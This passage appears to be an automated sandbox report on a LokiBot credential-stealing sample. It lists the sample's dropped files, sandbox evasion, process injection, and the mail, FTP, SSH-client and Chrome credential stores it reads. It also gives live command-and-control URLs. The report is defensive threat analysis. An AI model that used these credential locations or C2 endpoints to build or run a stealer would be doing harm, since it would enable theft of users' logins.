Source: Yara match	File source: Process Memory Space: cbgsujmwws.exe PID: 6240, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cbgsujmwws.exe PID: 492, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AD4
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AFC

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	File created: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	File created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)			Jump to dropped file

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-490

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe TID: 3384

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

API call chain: ExitProcess graph end node

graph_0-3759

Source: cbgsujmwws.exe, 00000002.00000002.633258341.00000000006B8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 1_2_009E03F8 mov eax, dword ptr fs:[00000030h]	1_2_009E03F8
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 1_2_009E061D mov eax, dword ptr fs:[00000030h]	1_2_009E061D
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 1_2_009E0736 mov eax, dword ptr fs:[00000030h]	1_2_009E0736
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 1_2_009E06F7 mov eax, dword ptr fs:[00000030h]	1_2_009E06F7
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 1_2_009E0772 mov eax, dword ptr fs:[00000030h]	1_2_009E0772
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]	2_2_0040317B

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Memory written: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Process created: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

0_2_004034F7

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Code function: 2_2_00406069 GetUserNameW,

2_2_00406069

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cbgsujmwws.exe PID: 6240, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cbgsujmwws.exe PID: 492, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: SmtpPassword		2_2_0040D069

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	11 Virtualization/Sandbox Evasion	2 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	111 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	5 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ypdTgfE0o8.exe	42%	Virustotal		Browse
ypdTgfE0o8.exe	11%	Metadefender		Browse
ypdTgfE0o8.exe	48%	ReversingLabs	Win32.Trojan.LokiBot
ypdTgfE0o8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	7%	ReversingLabs
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)	7%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.cbgsujmwws.exe.9f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.cbgsujmwws.exe.400000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.cbgsujmwws.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.cbgsujmwws.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.cbgsujmwws.exe.400000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.cbgsujmwws.exe.400000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.cbgsujmwws.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.cbgsujmwws.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://45.133.1.20/oluwa/five/fre.php	16%	Virustotal		Browse
http://45.133.1.20/oluwa/five/fre.php	100%	Avira URL Cloud	malware
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
45.133.1.20/oluwa/five/fre.php	16%	Virustotal		Browse
45.133.1.20/oluwa/five/fre.php	100%	Avira URL Cloud	malware
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.133.1.20/oluwa/five/fre.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
45.133.1.20/oluwa/five/fre.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	low
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

